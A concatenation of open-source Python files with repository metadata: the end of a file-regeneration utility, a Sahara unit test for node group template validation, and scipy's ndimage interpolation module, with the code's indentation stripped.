if definition[0] in string.digits:
listid = int(definition[:1])
definition = definition[2:]
# Hide double slashes as a control character
definition = definition.replace("\\\\", "\001")
# Do some normal C style transforms
definition = definition.replace("\\n", "\n")
definition = definition.replace("\\t", "\t")
# Get the doubled backslashes back as single backslashes
definition = definition.replace("\001", "\\")
startRepeat = definition.find("\\(")
endRepeat = definition.find("\\)")
intro = definition[:startRepeat]
out = ""
if intro.endswith("\n"):
pos = 0
else:
pos = len(intro)
out += intro
middle = definition[startRepeat+2:endRepeat]
for i in lists[listid]:
item = middle.replace("\\*", i)
if pos and (pos + len(item) >= 80):
out += "\\\n"
pos = 0
out += item
pos += len(item)
if item.endswith("\n"):
pos = 0
outro = definition[endRepeat+2:]
out += outro
out = out.replace("\n", lineEnd) # correct EOLs in generated content
output.append(out)
else:
# Simple form with no rule to transform input
output.extend(lists[0])
generated = True
if line.lstrip().startswith(commentPrefix + "--Autogenerated") or \
line.lstrip().startswith(commentPrefix + "~~Autogenerated"):
copying = 1
if retainDefs:
output.append(line)
output = [line.rstrip(" \t") for line in output] # trim trailing whitespace
return lineEnd.join(output) + lineEnd
def GenerateFile(inpath, outpath, commentPrefix, retainDefs, *lists):
"""Generate 'outpath' from 'inpath'.
"""
try:
with codecs.open(inpath, "r", "UTF-8") as infile:
original = infile.read()
updated = CopyWithInsertion(original, commentPrefix,
retainDefs, lists)
UpdateFile(outpath, updated)
except IOError:
print("Can not open %s" % inpath)
def Generate(inpath, outpath, commentPrefix, *lists):
"""Generate 'outpath' from 'inpath'.
"""
GenerateFile(inpath, outpath, commentPrefix, inpath == outpath, *lists)
def Regenerate(filename, commentPrefix, *lists):
"""Regenerate the given file.
"""
Generate(filename, filename, commentPrefix, *lists)
def UpdateLineInFile(path, linePrefix, lineReplace):
lines = []
updated = False
with codecs.open(path, "r", "utf-8") as f:
for l in f.readlines():
l = l.rstrip()
if not updated and l.startswith(linePrefix):
lines.append(lineReplace)
updated = True
else:
lines.append(l)
contents = lineEnd.join(lines) + lineEnd
UpdateFile(path, contents)
def ReplaceREInFile(path, match, replace):
with codecs.open(path, "r", "utf-8") as f:
contents = f.read()
contents = re.sub(match, replace, contents)
UpdateFile(path, contents)
| bsd-2-clause |
egafford/sahara | sahara/tests/unit/service/validation/test_ng_template_validation_create.py | 3 | 15036 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from sahara.service.api import v10 as api
from sahara.service.validations import node_group_template_schema as ngt_schema
from sahara.service.validations import node_group_templates as nt
from sahara.tests.unit.service.validation import utils as u
class TestNGTemplateCreateValidation(u.ValidationTestCase):
def setUp(self):
super(TestNGTemplateCreateValidation, self).setUp()
self._create_object_fun = nt.check_node_group_template_create
self.scheme = ngt_schema.NODE_GROUP_TEMPLATE_SCHEMA
api.plugin_base.setup_plugins()
def test_node_groups_create_required(self):
self._assert_create_object_validation(
data={
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'name' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a'
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'flavor_id' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'hadoop_version' is a required property")
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1'
},
bad_req_i=(1, "VALIDATION_ERROR",
u"'node_processes' is a required property")
)
self._assert_create_object_validation(
data={
'name': "a",
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': []
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'node_processes: \[\] is too short')
)
def test_ng_template_create_v_names(self):
data = {
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
}
self._assert_valid_name_hostname_validation(data)
def test_ng_template_create_v_node_processes(self):
self._assert_create_object_validation(
data={
'name': "a",
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ["namenode", "namenode"]
},
bad_req_i=(1, 'INVALID_DATA',
'Duplicates in node processes have been detected')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process']
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin doesn't support the following node processes: "
"['wrong_process']")
)
@mock.patch(
"sahara.service.validations.base.check_volume_availability_zone_exist")
@mock.patch("sahara.service.validations.base.check_volume_type_exists")
@mock.patch(
"sahara.service.validations.base.check_availability_zone_exist")
@mock.patch("sahara.service.validations.base.check_security_groups_exist")
def test_ng_template_create_v_right(self,
s_groups, a_zone, v_type, v_a_zone):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode',
'datanode',
'tasktracker',
'jobtracker'],
'image_id': '550e8400-e29b-41d4-a716-446655440000',
'node_configs': {},
'volumes_per_node': 2,
'volumes_size': 10,
'volume_type': 'fish',
'volumes_availability_zone': 'ocean',
'volume_mount_prefix': '/tmp',
'description': "my node group",
'floating_ip_pool': 'd9a3bebc-f788-4b81-9a93-aa048022c1ca',
'security_groups': ['cat', 'dog'],
'auto_security_group': False,
'availability_zone': 'here',
'is_proxy_gateway': False,
'volume_local_to_instance': False,
'is_public': False,
'is_protected': False
}
)
def test_ng_template_create_v_nulls(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode',
'datanode',
'tasktracker',
'jobtracker'],
'image_id': None,
'node_configs': None,
'volumes_size': None,
'volume_type': None,
'volumes_availability_zone': None,
'volume_mount_prefix': None,
'description': None,
'floating_ip_pool': None,
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'is_proxy_gateway': None,
'volume_local_to_instance': None,
'is_public': None,
'is_protected': None
}
)
def test_ng_template_create_v_minimum_ints(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_per_node': -1
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_per_node: -1(.0)? is less than the minimum '
u'of 0')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_size': 0
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_size: 0(.0)? is less than the minimum of 1')
)
def test_ng_template_create_v_types(self):
default_data = {
'name': 'a', 'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
}
self._assert_types(default_data)
def test_ng_template_create_v_unique_ng(self):
data = {
'name': 'test',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']}
self._assert_create_object_validation(
data=data,
bad_req_i=(1, 'NAME_ALREADY_EXISTS',
"NodeGroup template with name 'test' already exists")
)
def test_ng_template_create_v_flavor_exists(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '1',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode']
},
bad_req_i=(1, 'NOT_FOUND',
"Requested flavor '1' not found")
)
def test_ng_template_create_validate_image(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '12345'
},
bad_req_i=(1, 'VALIDATION_ERROR',
"image_id: '12345' is not a 'uuid'")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '12345678-1234-1234-1234-123456789000'
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Requested image "
"'12345678-1234-1234-1234-123456789000' "
"is not registered")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '813fe450-40d2-4acc-ade5-ea753a1bd5bc'
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Requested image "
"'813fe450-40d2-4acc-ade5-ea753a1bd5bc' "
"doesn't contain required tags: "
"['0.1']")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'image_id': '550e8400-e29b-41d4-a716-446655440000'
}
)
def test_ng_template_create_v_ng_configs(self):
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'node_configs': {
'wrong_target': {
u'mapreduce.task.tmp.dir': '/temp/'
}
}},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin doesn't contain applicable "
"target 'wrong_target'")
)
self._assert_create_object_validation(
data={
'name': 'test-ng',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['namenode'],
'node_configs': {
'general': {
's': 'a'
}
}
},
bad_req_i=(1, 'INVALID_REFERENCE',
"Plugin's applicable target 'general' doesn't "
"contain config with name 's'")
)
def test_ng_template_cinder(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_per_node': -1
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_per_node: -1(.0)? is less than the minimum '
u'of 0')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['wrong_process'],
'volumes_size': 0
},
bad_req_i=(1, 'VALIDATION_ERROR',
u'volumes_size: 0(.0)? is less than the minimum of 1')
)
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1,
'volumes_size': 1,
'volume_mount_prefix': '/mnt/volume'
}
)
data = {
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1,
'volumes_size': 1,
'volume_mount_prefix': 'qwerty'
}
self._assert_create_object_validation(
data=data,
bad_req_i=(1, 'VALIDATION_ERROR', "volume_mount_prefix: 'qwerty' "
"is not a 'posix_path'")
)
def test_wrong_floating_ip_pool(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'floating_ip_pool': 'network_bad'
},
bad_req_i=(1, 'NOT_FOUND', "Floating IP pool network_bad "
"not found")
)
def test_volumes_per_node_without_volumes_size(self):
self._assert_create_object_validation(
data={
'name': 'a',
'flavor_id': '42',
'plugin_name': 'fake',
'hadoop_version': '0.1',
'node_processes': ['datanode', 'tasktracker'],
'volumes_per_node': 1
},
bad_req_i=(1, 'INVALID_REFERENCE', "You must specify a "
"volumes_size parameter")
)
| apache-2.0 |
tcheehow/MissionPlanner | Lib/site-packages/scipy/ndimage/interpolation.py | 55 | 25609 | # Copyright (C) 2003-2005 Peter J. Verveer
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy
import _ni_support
import _nd_image
def _extend_mode_to_code(mode):
mode = _ni_support._extend_mode_to_code(mode)
return mode
def spline_filter1d(input, order=3, axis=-1, output=numpy.float64):
"""
Calculates a one-dimensional spline filter along the given axis.
The lines of the array along the given axis are filtered by a
spline filter. The order of the spline must be >= 2 and <= 5.
Parameters
----------
input : array_like
The input array.
order : int, optional
The order of the spline, default is 3.
axis : int, optional
The axis along which the spline filter is applied. Default is the last
axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array. Default is `numpy.float64`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order in [0, 1]:
output[...] = numpy.array(input)
else:
axis = _ni_support._check_axis(axis, input.ndim)
_nd_image.spline_filter1d(input, order, axis, output)
return return_value
def spline_filter(input, order=3, output = numpy.float64):
"""
Multi-dimensional spline filter.
For more details, see `spline_filter1d`.
See Also
--------
spline_filter1d
Notes
-----
The multi-dimensional filter is implemented as a sequence of
one-dimensional spline filters. The intermediate arrays are stored
in the same data type as the output. Therefore, for output types
with a limited precision, the results may be imprecise because
intermediate results may be stored with insufficient precision.
"""
if order < 2 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
output, return_value = _ni_support._get_output(output, input)
if order not in [0, 1] and input.ndim > 0:
for axis in range(input.ndim):
spline_filter1d(input, order, axis, output = output)
input = output
else:
output[...] = input[...]
return return_value
def geometric_transform(input, mapping, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True,
extra_arguments=(), extra_keywords={}):
"""
Apply an arbritrary geometric transform.
The given mapping function is used to find, for each point in the
output, the corresponding coordinates in the input. The value of the
input at those coordinates is determined by spline interpolation of
the requested order.
Parameters
----------
input : array_like
The input array.
mapping : callable
A callable object that accepts a tuple of length equal to the output
array rank, and returns the corresponding input coordinates as a tuple
of length equal to the input array rank.
output_shape : tuple of ints
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
extra_arguments : tuple, optional
Extra arguments passed to `mapping`.
extra_keywords : dict, optional
Extra keywords passed to `mapping`.
Returns
-------
return_value : ndarray or None
The filtered input. If `output` is given as a parameter, None is
returned.
See Also
--------
map_coordinates, affine_transform, spline_filter1d
Examples
--------
>>> a = np.arange(12.).reshape((4, 3))
>>> def shift_func(output_coords):
... return (output_coords[0] - 0.5, output_coords[1] - 0.5)
...
>>> sp.ndimage.geometric_transform(a, shift_func)
array([[ 0. , 0. , 0. ],
[ 0. , 1.362, 2.738],
[ 0. , 4.812, 6.187],
[ 0. , 8.263, 9.637]])
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_nd_image.geometric_transform(filtered, mapping, None, None, None,
output, order, mode, cval, extra_arguments, extra_keywords)
return return_value
def map_coordinates(input, coordinates, output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Map the input array to new coordinates by interpolation.
The array of coordinates is used to find, for each point in the output,
the corresponding coordinates in the input. The value of the input at
those coordinates is determined by spline interpolation of the
requested order.
The shape of the output is derived from that of the coordinate
array by dropping the first axis. The values of the array along
the first axis are the coordinates in the input array at which the
output value is found.
Parameters
----------
input : ndarray
The input array.
coordinates : array_like
The coordinates at which `input` is evaluated.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray
The result of transforming the input. The shape of the output is
derived from that of `coordinates` by dropping the first axis.
See Also
--------
spline_filter, geometric_transform, scipy.interpolate
Examples
--------
>>> import scipy.ndimage
>>> a = np.arange(12.).reshape((4, 3))
>>> a
array([[ 0., 1., 2.],
[ 3., 4., 5.],
[ 6., 7., 8.],
[ 9., 10., 11.]])
>>> sp.ndimage.map_coordinates(a, [[0.5, 2], [0.5, 1]], order=1)
[ 2. 7.]
Above, the interpolated value of a[0.5, 0.5] gives output[0], while
a[2, 1] is output[1].
>>> inds = np.array([[0.5, 2], [0.5, 4]])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=-33.3)
array([ 2. , -33.3])
>>> sp.ndimage.map_coordinates(a, inds, order=1, mode='nearest')
array([ 2., 8.])
>>> sp.ndimage.map_coordinates(a, inds, order=1, cval=0, output=bool)
array([ True, False], dtype=bool
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
coordinates = numpy.asarray(coordinates)
if numpy.iscomplexobj(coordinates):
raise TypeError('Complex type not supported')
output_shape = coordinates.shape[1:]
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
if coordinates.shape[0] != input.ndim:
raise RuntimeError('invalid shape for coordinate array')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
_nd_image.geometric_transform(filtered, None, coordinates, None, None,
output, order, mode, cval, None, None)
return return_value
def affine_transform(input, matrix, offset=0.0, output_shape=None,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Apply an affine transformation.
The given matrix and offset are used to find for each point in the
output the corresponding coordinates in the input by an affine
transformation. The value of the input at those coordinates is
determined by spline interpolation of the requested order. Points
outside the boundaries of the input are filled according to the given
mode.
Parameters
----------
input : ndarray
The input array.
matrix : ndarray
The matrix must be two-dimensional or can also be given as a
one-dimensional sequence or array. In the latter case, it is assumed
that the matrix is diagonal. A more efficient algorithms is then
applied that exploits the separability of the problem.
offset : float or sequence, optional
The offset into the array where the transform is applied. If a float,
`offset` is the same for each axis. If a sequence, `offset` should
contain one value for each axis.
output_shape : tuple of ints, optional
Shape tuple.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The transformed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if output_shape is None:
output_shape = input.shape
if input.ndim < 1 or len(output_shape) < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
matrix = numpy.asarray(matrix, dtype = numpy.float64)
if matrix.ndim not in [1, 2] or matrix.shape[0] < 1:
raise RuntimeError('no proper affine matrix provided')
if matrix.shape[0] != input.ndim:
raise RuntimeError('affine matrix has wrong number of rows')
if matrix.ndim == 2 and matrix.shape[1] != output.ndim:
raise RuntimeError('affine matrix has wrong number of columns')
if not matrix.flags.contiguous:
matrix = matrix.copy()
offset = _ni_support._normalize_sequence(offset, input.ndim)
offset = numpy.asarray(offset, dtype = numpy.float64)
if offset.ndim != 1 or offset.shape[0] < 1:
raise RuntimeError('no proper offset provided')
if not offset.flags.contiguous:
offset = offset.copy()
if matrix.ndim == 1:
_nd_image.zoom_shift(filtered, matrix, offset, output, order,
mode, cval)
else:
_nd_image.geometric_transform(filtered, None, None, matrix, offset,
output, order, mode, cval, None, None)
return return_value
def shift(input, shift, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Shift an array.
The array is shifted using spline interpolation of the requested order.
Points outside the boundaries of the input are filled according to the
given mode.
Parameters
----------
input : ndarray
The input array.
shift : float or sequence, optional
The shift along the axes. If a float, `shift` is the same for each
axis. If a sequence, `shift` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The shifted input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
output, return_value = _ni_support._get_output(output, input)
shift = _ni_support._normalize_sequence(shift, input.ndim)
shift = [-ii for ii in shift]
shift = numpy.asarray(shift, dtype = numpy.float64)
if not shift.flags.contiguous:
shift = shift.copy()
_nd_image.zoom_shift(filtered, None, shift, output, order, mode, cval)
return return_value
def zoom(input, zoom, output=None, order=3, mode='constant', cval=0.0,
prefilter=True):
"""
Zoom an array.
The array is zoomed using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
zoom : float or sequence, optional
The zoom factor along the axes. If a float, `zoom` is the same for each
axis. If a sequence, `zoom` should contain one value for each axis.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The zoomed input. If `output` is given as a parameter, None is
returned.
"""
if order < 0 or order > 5:
raise RuntimeError('spline order not supported')
input = numpy.asarray(input)
if numpy.iscomplexobj(input):
raise TypeError('Complex type not supported')
if input.ndim < 1:
raise RuntimeError('input and output rank must be > 0')
mode = _extend_mode_to_code(mode)
if prefilter and order > 1:
filtered = spline_filter(input, order, output = numpy.float64)
else:
filtered = input
zoom = _ni_support._normalize_sequence(zoom, input.ndim)
output_shape = tuple([int(ii * jj) for ii, jj in zip(input.shape, zoom)])
zoom = (numpy.array(input.shape)-1)/(numpy.array(output_shape,float)-1)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
zoom = numpy.asarray(zoom, dtype = numpy.float64)
zoom = numpy.ascontiguousarray(zoom)
_nd_image.zoom_shift(filtered, zoom, None, output, order, mode, cval)
return return_value
def _minmax(coor, minc, maxc):
if coor[0] < minc[0]:
minc[0] = coor[0]
if coor[0] > maxc[0]:
maxc[0] = coor[0]
if coor[1] < minc[1]:
minc[1] = coor[1]
if coor[1] > maxc[1]:
maxc[1] = coor[1]
return minc, maxc
def rotate(input, angle, axes=(1, 0), reshape=True,
output=None, order=3,
mode='constant', cval=0.0, prefilter=True):
"""
Rotate an array.
The array is rotated in the plane defined by the two axes given by the
`axes` parameter using spline interpolation of the requested order.
Parameters
----------
input : ndarray
The input array.
angle : float
The rotation angle in degrees.
axes : tuple of 2 ints, optional
The two axes that define the plane of rotation. Default is the first
two axes.
reshape : bool, optional
If `reshape` is true, the output shape is adapted so that the input
array is contained completely in the output. Default is True.
output : ndarray or dtype, optional
The array in which to place the output, or the dtype of the returned
array.
order : int, optional
The order of the spline interpolation, default is 3.
The order has to be in the range 0-5.
mode : str, optional
Points outside the boundaries of the input are filled according
to the given mode ('constant', 'nearest', 'reflect' or 'wrap').
Default is 'constant'.
cval : scalar, optional
Value used for points outside the boundaries of the input if
``mode='constant'``. Default is 0.0
prefilter : bool, optional
The parameter prefilter determines if the input is pre-filtered with
`spline_filter` before interpolation (necessary for spline
interpolation of order > 1). If False, it is assumed that the input is
already filtered. Default is True.
Returns
-------
return_value : ndarray or None
The rotated input. If `output` is given as a parameter, None is
returned.
"""
input = numpy.asarray(input)
axes = list(axes)
rank = input.ndim
if axes[0] < 0:
axes[0] += rank
if axes[1] < 0:
axes[1] += rank
if axes[0] < 0 or axes[1] < 0 or axes[0] > rank or axes[1] > rank:
raise RuntimeError('invalid rotation plane specified')
if axes[0] > axes[1]:
axes = axes[1], axes[0]
angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype = numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
if reshape:
mtrx = numpy.array([[ m11, -m21],
[-m12, m22]], dtype = numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype = numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype = numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, output,
order, mode, cval, prefilter)
else:
coordinates = []
size = numpy.product(input.shape,axis=0)
size //= input.shape[axes[0]]
size //= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = range(input.ndim)
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
| gpl-3.0 |
tmerrick1/spack | lib/spack/external/jinja2/bccache.py | 84 | 12794 | # -*- coding: utf-8 -*-
"""
